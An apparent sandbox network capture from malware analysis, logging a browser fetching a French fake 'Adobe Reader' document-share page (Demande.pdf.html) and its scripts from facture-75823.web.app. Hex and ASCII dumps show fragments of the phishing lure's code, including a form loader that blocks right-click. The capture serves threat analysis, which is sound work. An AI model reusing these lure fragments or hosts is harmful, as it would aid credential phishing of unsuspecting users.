                                                        2025-03-25 14:45:01 UTC1023OUTGET /download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download HTTP/1.1
                                                        Host: drive.usercontent.google.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Browser-Channel: stable
                                                        X-Browser-Year: 2025
                                                        X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=
                                                        X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.
                                                        X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ==
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:04 UTC5011INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: AKDAyIth64p9S-js6E-qznoA3tpBPu76wZo_R551_trvtOGgKZjkYvzp2k10cA0d9R51Q_Up
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="Demande.pdf.html"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 22252
                                                        Last-Modified: Wed, 12 Feb 2025 01:31:56 GMT
                                                        Date: Tue, 25 Mar 2025 14:45:04 GMT
                                                        Expires: Tue, 25 Mar 2025 14:45:04 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=HRouZQ==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2025-03-25 14:45:04 UTC5011INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 74 61 69 6c 77 69 6e 64 63 73 73 2e 63 6f 6d 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 52 65 61 64 65 72 20 2d 20 50 61 72 74 61 67 65 20 64 65 20 64 6f 63 75 6d 65 6e 74 20 73 c3 a9 63 75 72 69
                                                        Data Ascii: <!DOCTYPE html><html lang="fr"><head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="https://cdn.tailwindcss.com"></script> <title>Adobe Reader - Partage de document scuri
                                                        2025-03-25 14:45:04 UTC4678INData Raw: 4d 53 34 35 4e 54 4e 68 4d 79 34 33 4e 6a 4d 73 4d 79 34 33 4e 6a 4d 73 4d 43 77 77 4c 44 41 73 4c 6a 49 77 4f 43 30 78 4c 6a 49 32 4e 43 34 78 4d 7a 67 75 4d 54 4d 34 4c 44 41 73 4d 43 77 78 4c 43 34 78 4d 6a 51 74 4c 6a 45 30 4e 57 67 7a 4c 6a 4d 78 4e 57 4d 75 4d 53 77 77 4c 43 34 78 4e 44 55 75 4d 44 49 78 4c 6a 45 32 4e 69 34 78 4d 6a 52 73 4e 43 34 33 4c 44 45 7a 4c 6a 49 31 4f 57 4d 75 4d 44 51 78 4c 6a 45 75 4d 44 49 78 4c 6a 45 34 4e 69 30 75 4d 53 34 78 4f 44 5a 6f 4c 54 49 75 4e 6a 6b 7a 59 53 34 79 4d 44 6b 75 4d 6a 41 35 4c 44 41 73 4d 43 77 78 4c 53 34 79 4d 6a 67 74 4c 6a 45 30 4e 57 77 74 4d 53 34 77 4e 54 59 74 4d 79 34 77 4f 44 64 61 62 54 51 75 4d 44 45 35 4c 54 49 75 4e 54 67 35 59 79 30 75 4e 44 45 30 4c 54 45 75 4d 7a 59 33 4c 54 45
                                                        Data Ascii: MS45NTNhMy43NjMsMy43NjMsMCwwLDAsLjIwOC0xLjI2NC4xMzguMTM4LDAsMCwxLC4xMjQtLjE0NWgzLjMxNWMuMSwwLC4xNDUuMDIxLjE2Ni4xMjRsNC43LDEzLjI1OWMuMDQxLjEuMDIxLjE4Ni0uMS4xODZoLTIuNjkzYS4yMDkuMjA5LDAsMCwxLS4yMjgtLjE0NWwtMS4wNTYtMy4wODdabTQuMDE5LTIuNTg5Yy0uNDE0LTEuMzY3LTE
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 2d 67 72 61 79 2d 31 30 30 2f 37 30 20 70 2d 34 20 72 6f 75 6e 64 65 64 2d 6d 64 20 6d 62 2d 36 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 6c 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 51 41 41 41 41 45 41 43 41 59 41 41 41 42 63 63 71 68 6d 41 41 41 41 49 47 4e 49 55 6b 30 41 41 48 6f 6d 41 41 43 41 68 41 41 41 2b 67 41 41 41 49 44 6f 41 41 42 31 4d 41 41 41 36 6d 41 41 41 44 71 59 41 41 41 58 63 4a 79 36 55 54 77 41 41 41 41 47
                                                        Data Ascii: <div class="bg-gray-100/70 p-4 rounded-md mb-6"> <div class="file-info"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEACAYAAABccqhmAAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAG
                                                        2025-03-25 14:45:04 UTC101INData Raw: 4b 37 6b 4f 2f 47 46 4c 71 6f 42 42 4a 73 44 6a 55 59 44 4a 71 41 41 36 77 30 67 4d 31 79 55 56 41 59 61 31 70 48 34 67 67 2b 57 2b 48 47 31 67 6b 5a 6a 63 59 69 77 37 70 34 35 66 42 67 6d 6b 41 63 59 41 45 48 54 70 68 47 65 43 78 41 38 48 70 34 44 34 76 63 4a 75 4b 35 37 35 68 42 4d 49 44 4d 73 44 53
                                                        Data Ascii: K7kO/GFLqoBBJsDjUYDJqAA6w0gM1yUVAYa1pH4gg+W+HG1gkZjcYiw7p45fBgmkAcYAEHTphGeCxA8Hp4D4vcJuK575hBMIDMsDS
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 43 2b 34 44 46 68 70 42 38 55 49 53 6a 79 59 43 30 67 69 55 61 6a 51 56 4e 4c 4a 6e 42 34 71 4f 6f 38 63 49 4b 6c 41 55 51 4a 43 39 39 6b 45 36 67 75 74 69 70 58 66 6d 64 64 44 78 41 57 76 71 67 5a 45 4b 54 5a 61 41 52 71 41 6a 41 42 57 5a 67 61 67 4d 7a 54 5a 4c 49 4a 67 44 52 6b 53 2f 38 67 7a 55 61 44 70 71 5a 67 41 6c 6c 67 61 67 43 67 58 4d 6f 33 55 31 46 37 58 34 5a 6d 6f 30 46 54 6d 39 75 72 43 41 38 64 67 67 6d 6b 41 51 4d 41 78 68 46 63 44 35 41 48 66 31 4d 52 31 33 58 50 48 49 51 4a 4a 41 49 44 41 42 4a 55 30 33 6b 51 37 68 42 63 69 6b 62 43 48 4a 72 4e 42 6d 33 65 44 42 4e 49 6f 30 73 4d 77 4a 4d 38 42 6b 78 48 4a 50 67 67 73 76 30 43 37 66 30 45 47 72 54 35 6e 6e 76 47 58 4c 64 2b 35 75 43 68 51 30 4e 56 35 38 31 45 75 73 51 41 69 4e 71 43 44
                                                        Data Ascii: C+4DFhpB8UISjyYC0giUajQVNLJnB4qOo8cIKlAUQJC99kE6gutipXfmddDxAWvqgZEKTZaARqAjABWZgagMzTZLIJgDRkS/8gzUaDpqZgAllgagCgXMo3U1F7X4Zmo0FTm9urCA8dggmkAQMAxhFcD5AHf1MR13XPHIQJJAIDABJU03kQ7hBcikbCHJrNBm3eDBNIo0sMwJM8BkxHJPggsv0C7f0EGrT5nnvGXLd+5uChQ0NV581EusQAiNqCD
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 73 7a 62 6b 70 78 32 77 53 2b 32 33 55 6d 59 4c 63 42 6d 4c 35 37 6d 4e 4c 6c 4f 46 6b 7a 57 75 36 4e 38 58 4d 71 36 67 51 4d 48 2f 64 66 42 39 38 54 2f 54 74 38 54 4c 59 4a 45 48 66 2b 79 4d 6a 49 6f 67 6e 55 54 37 2b 77 62 39 39 51 71 54 64 49 45 33 59 61 67 48 62 68 61 79 72 39 53 36 6a 2b 6d 34 54 49 43 4a 5a 79 45 53 72 31 2f 66 4e 46 6e 78 65 39 46 7a 34 76 36 5a 7a 67 38 62 59 4a 2b 4d 30 42 2f 69 62 41 30 67 41 79 79 36 44 55 2f 55 4a 56 69 62 2b 59 55 50 4e 57 2f 34 75 32 2f 34 74 30 41 50 71 66 7a 79 4a 73 30 65 76 77 5a 32 54 65 79 7a 4b 45 36 4a 74 41 33 58 56 50 50 38 2f 63 42 46 67 61 77 42 4b 6c 7a 41 55 32 68 45 4c 43 79 72 75 66 58 72 47 51 38 33 59 41 52 74 4e 5a 48 67 61 55 57 66 47 58 52 2f 77 79 47 34 6b 45 57 61 6f 4a 31 4e 33 54 7a
                                                        Data Ascii: szbkpx2wS+23UmYLcBmL57mNLlOFkzWu6N8XMq6gQMH/dfB98T/Tt8TLYJEHf+yMjIognUT7+wb99QqTdIE3YagHbhayr9S6j+m4TICJZyESr1/fNFnxe9Fz4v6Zzg8bYJ+M0B/ibA0gAyy6DU/UJVib+YUPNW/4u2/4t0APqfzyJs0evwZ2TeyzKE6JtA3XVPP8/cBFgawBKlzAU2hELCyrufXrGQ83YARtNZHgaUWfGXR/wyG4kEWaoJ1N3Tz
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 2f 39 4f 35 4c 50 2b 62 6d 46 31 67 7a 4e 66 58 43 42 69 49 68 71 6a 52 47 71 4e 64 59 55 7a 36 74 47 70 58 4d 30 45 52 68 41 5a 73 70 5a 37 36 71 32 33 61 39 32 76 72 2f 2f 6b 53 39 65 4f 78 5a 35 37 35 62 4a 72 56 52 72 72 4d 6b 39 39 44 63 2f 66 5a 6d 75 6e 6a 68 47 4e 38 36 66 6f 2f 6e 50 72 30 54 4f 58 33 6e 66 44 6c 72 39 30 4f 34 63 4b 51 4d 52 4d 41 42 70 4a 49 54 43 54 66 79 79 38 63 52 38 2b 4f 71 4a 58 30 57 4f 39 61 31 64 54 79 74 57 4c 35 66 55 57 65 7a 6c 38 39 38 63 70 57 75 2f 2f 31 33 69 4f 58 4f 58 4c 75 54 50 53 46 7a 2b 6a 45 75 6f 50 47 41 41 71 5a 51 72 66 4b 49 53 78 5a 2b 6a 36 71 2b 72 37 66 2f 5a 53 33 76 70 2b 71 6b 33 4e 61 53 63 66 74 68 6d 57 42 70 41 4a 63 74 31 68 59 47 6f 69 30 54 63 32 36 2b 70 7a 55 39 55 71 4f 6f 76 65
                                                        Data Ascii: /9O5LP+bmF1gzNfXCBiIhqjRGqNdYUz6tGpXM0ERhAZspZ76q23a92vr//kS9eOxZ575bJrVRrrMk99Dc/fZmunjhGN86fo/nPr0TOX3nfDlr90O4cKQMRMABpJITCTfyy8cR8+OqJX0WO9a1dTytWL5fUWezl898cpWu//13iOXOXLuTPSFz+jEuoPGAAqZQrfKISxZ+j6q+r7f/ZS3vp+qk3NaScfthmWBpAJct1hYGoi0Tc26+pzU9UqOove
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 79 75 30 34 45 42 55 50 54 68 69 4b 2f 65 69 7a 2b 52 5a 55 68 76 2b 70 55 6a 48 53 56 2f 37 78 33 72 61 4e 58 32 6e 64 53 37 64 6e 33 6f 30 78 36 74 6f 6b 66 6f 35 6d 65 58 36 59 73 54 78 34 51 6c 39 74 79 6c 69 2f 54 46 69 57 50 55 65 4f 68 52 71 58 78 4f 76 33 49 34 56 76 78 44 32 78 36 68 57 37 63 38 47 4c 73 49 35 2f 39 4f 76 6b 46 58 58 7a 75 32 5a 41 52 4a 66 52 59 69 47 61 78 2b 61 44 63 74 7a 48 61 61 33 76 56 54 72 30 66 79 4e 54 69 78 68 51 59 6e 48 68 43 6d 57 32 75 4d 4a 46 77 68 38 32 46 41 62 41 30 67 2b 31 65 61 4e 46 51 75 4f 57 41 57 50 5a 4a 6a 4c 50 2f 36 71 54 65 57 2f 6a 30 34 73 5a 57 47 66 37 41 6e 49 76 78 67 2b 72 58 47 47 68 72 65 74 59 66 36 31 71 36 6e 54 31 39 36 4c 70 4c 65 74 62 64 2b 52 37 66 65 2f 32 44 71 46 4e 72 57 48
                                                        Data Ascii: yu04EBUPThiK/eiz+RZUhv+pUjHSV/7x3raNX2ndS7dn3o0x6tokfo5meX6YsTx4Ql9tyli/TFiWPUeOhRqXxOv3I4VvxD2x6hW7c8GLsI5/9OvkFXXzu2ZARJfRYiGax+aDctzHaa3vVTr0fyNTixhQYnHhCmW2uMJFwh82FAbA0g+1eaNFQuOWAWPZJjLP/6qTeW/j04sZWGf7AnIvxg+rXGGhretYf61q6nT196LpLetbd+R7fe/2DqFNrWH
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 39 68 52 64 4a 4d 77 73 4b 64 53 41 34 46 46 34 39 62 2b 42 4e 58 41 32 68 50 4f 2b 35 6b 6f 54 55 6a 58 52 4f 4a 79 2f 35 73 68 6e 77 55 78 75 69 71 76 79 6c 42 35 49 4f 78 41 65 51 6e 61 59 70 77 62 69 53 58 49 73 37 2b 49 56 30 34 6e 75 63 4a 78 65 38 34 37 66 58 2f 59 64 7a 52 73 64 6a 39 41 4f 6f 78 38 77 37 2b 38 74 61 72 79 54 46 51 2f 48 4f 39 30 4a 72 70 32 4e 64 41 4b 36 61 4c 33 35 41 6f 38 73 4c 54 41 42 62 76 65 64 35 31 41 4d 72 49 73 66 35 34 2f 76 4d 72 64 43 31 47 66 45 6e 43 64 35 78 32 74 56 74 55 2f 62 39 6c 38 6f 47 59 39 4e 70 4e 67 50 37 31 45 35 48 33 72 70 39 36 4d 37 59 57 6b 48 61 4c 72 72 33 31 71 6e 42 39 51 5a 6d 59 49 54 75 65 48 58 39 42 65 42 70 41 6c 52 54 62 64 49 43 49 32 68 74 34 42 4d 55 58 4a 33 7a 2f 63 6b 54 78 2b
                                                        Data Ascii: 9hRdJMwsKdSA4FF49b+BNXA2hPO+5koTUjXROJy/5shnwUxuiqvylB5IOxAeQnaYpwbiSXIs7+IV04nucJxe847fX/YdzRsdj9AOox8w7+8taryTFQ/HO90Jrp2NdAK6aL35Ao8sLTABbved51AMrIsf54/vMrdC1GfEnCd5x2tVtU/b9l8oGY9NpNgP71E5H3rp96M7YWkHaLrr31qnB9QZmYITueHX9BeBpAlRTbdICI2ht4BMUXJ3z/ckTx+
                                                        2025-03-25 14:45:04 UTC1220INData Raw: 41 70 66 43 49 54 6e 74 66 38 78 58 76 31 73 59 65 69 36 61 49 78 66 78 45 73 44 55 41 48 56 63 77 70 36 6a 37 68 53 30 54 42 52 76 77 35 34 6a 4d 39 41 77 4c 59 47 6f 42 44 4c 43 63 43 45 70 48 61 4e 6a 36 52 53 63 39 64 4e 34 6d 2f 75 36 76 2b 50 6d 77 4e 67 43 75 71 66 34 48 48 6e 47 65 30 75 38 56 76 58 6f 78 71 67 41 46 55 52 50 63 49 58 79 49 61 56 75 49 6e 61 38 52 50 42 41 4e 51 54 74 72 41 68 46 58 43 54 7a 6e 46 72 4c 79 59 48 5a 55 75 65 42 71 41 51 64 39 52 57 53 4f 52 42 6d 56 5a 4c 69 4b 57 34 2f 7a 46 71 76 35 6d 35 69 6b 5a 6e 67 5a 51 49 54 4b 43 56 39 6b 33 61 65 5a 44 42 66 46 33 43 7a 43 41 42 4c 4b 55 37 71 6f 48 4a 4d 78 39 2b 4c 70 52 2f 48 7a 6a 4c 41 6f 4d 67 50 4a 56 34 32 55 45 50 35 5a 70 74 64 78 69 4c 46 58 66 6a 43 4c 52 73
                                                        Data Ascii: ApfCITntf8xXv1sYei6aIxfxEsDUAHVcwp6j7hS0TBRvw54jM9AwLYGoBDLCcCEpHaNj6RSc9dN4m/u6v+PmwNgCuqf4HHnGe0u8VvXoxqgAFURPcIXyIaVuIna8RPBANQTtrAhFXCTznFrLyYHZUueBqAQd9RWSORBmVZLiKW4/zFqv5m5ikZngZQITKCV9k3aeZDBfF3CzCABLKU7qoHJMx9+LpR/HzjLAoMgPJV42UEP5ZptdxiLFXfjCLRs


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.749696172.67.41.164432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC524OUTGET / HTTP/1.1
                                                        Host: cdn.tailwindcss.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:05 UTC363INHTTP/1.1 302 Found
                                                        Date: Tue, 25 Mar 2025 14:45:05 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        location: /3.4.16
                                                        strict-transport-security: max-age=63072000
                                                        x-vercel-cache: MISS
                                                        x-vercel-id: cle1::iad1::p8wj9-1742913665209-dac8528ec35f
                                                        CF-Cache-Status: HIT
                                                        Age: 238
                                                        Server: cloudflare
                                                        CF-RAY: 925f30a6096d49c1-EWR
                                                        2025-03-25 14:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.749699199.36.158.1004432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC553OUTGET /styles_ad.css HTTP/1.1
                                                        Host: facture-75823.web.app
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:05 UTC600INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 2458
                                                        Cache-Control: max-age=3600
                                                        Content-Type: text/css; charset=utf-8
                                                        Etag: "e4c8dae91111a7e2fcfaa0a0d7f8485e7dabf22da8fc3b02e5d041f24d28d6a4"
                                                        Last-Modified: Tue, 11 Feb 2025 21:26:33 GMT
                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                        Accept-Ranges: bytes
                                                        Date: Tue, 25 Mar 2025 14:45:05 GMT
                                                        X-Served-By: cache-lga21949-LGA
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1742913906.556252,VS0,VE72
                                                        Vary: x-fh-requested-host, accept-encoding
                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                        2025-03-25 14:45:05 UTC1378INData Raw: 2f 2a 20 56 69 64 c3 a9 6f 20 65 6e 20 70 6c 65 69 6e 20 c3 a9 63 72 61 6e 20 2a 2f 0d 0a 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 76 69 64 65 6f 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 36 63 58 59 6b 39 48 4d 2f 43 61 70 74 75 72 65 2d 64 2d 63 72 61 6e 2d 32 30 32 35 2d 30 32 2d 31 31 2d 31 34 34 39 32 38 2e 70 6e 67 27 29 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75
                                                        Data Ascii: /* Vido en plein cran */.background-video { position: fixed; right: 0; bottom: 0; min-width: 100%; min-height: 100%; background-image: url('https://i.ibb.co/6cXYk9HM/Capture-d-cran-2025-02-11-144928.png'); backgrou
                                                        2025-03-25 14:45:05 UTC1080INData Raw: 6f 72 65 20 70 6c 75 73 20 69 6d 70 6f 72 74 61 6e 74 65 20 64 65 20 6c 61 20 6c 61 72 67 65 75 72 20 2a 2f 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 3b 20 2f 2a 20 43 65 6e 74 72 61 67 65 20 61 76 65 63 20 6d 6f 69 6e 73 20 64 e2 80 99 65 73 70 61 63 65 20 2a 2f 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 20 2f 2a 20 52 c3 a9 64 75 63 74 69 6f 6e 20 64 75 20 70 61 64 64 69 6e 67 20 70 6f 75 72 20 75 6e 20 64 65 73 69 67 6e 20 70 6c 75 73 20 64 69 73 63 72 65 74 20 2a 2f 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 2f 2a 20 53 75 70 70 72 65 73 73 69 6f 6e 20 64 75 20 66 6f 6e 64 20 62 6c 61 6e 63 20 2a 2f 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64
                                                        Data Ascii: ore plus importante de la largeur */ margin: 20px auto; /* Centrage avec moins despace */ padding: 10px; /* Rduction du padding pour un design plus discret */ background: none !important; /* Suppression du fond blanc */ border-rad


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.749698199.36.158.1004432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC538OUTGET /loader_ad.js HTTP/1.1
                                                        Host: facture-75823.web.app
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:05 UTC608INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Cache-Control: max-age=3600
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Etag: "5a8e5c8d3df451894236dd5db8643ea5a06c3461251943da9def12178ed3364a"
                                                        Last-Modified: Tue, 11 Feb 2025 21:26:33 GMT
                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                        Accept-Ranges: bytes
                                                        Date: Tue, 25 Mar 2025 14:45:05 GMT
                                                        X-Served-By: cache-lga21932-LGA
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1742913906.562936,VS0,VE176
                                                        Vary: x-fh-requested-host, accept-encoding
                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                        2025-03-25 14:45:05 UTC1229INData Raw: 2f 2f 20 44 c3 a9 73 61 63 74 69 76 65 72 20 6c 65 20 6d 65 6e 75 20 63 6f 6e 74 65 78 74 75 65 6c 0d 0a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a 2f 2f 20 47 c3 a9 72 65 72 20 6c 65 20 6c 6f 61 64 65 72 20 65 74 20 61 66 66 69 63 68 65 72 20 6c 65 20 66 6f 72 6d 75 6c 61 69 72 65 0d 0a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 2f 2f 20 53 69 6d 75 6c 65 72 20 75 6e 20 64 c3 a9 6c 61
                                                        Data Ascii: // Dsactiver le menu contextueldocument.addEventListener("contextmenu", function (e) { e.preventDefault();});// Grer le loader et afficher le formulairedocument.addEventListener("DOMContentLoaded", function () { // Simuler un dla


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.749700199.36.158.1004432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC534OUTGET /anti9.js HTTP/1.1
                                                        Host: facture-75823.web.app
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
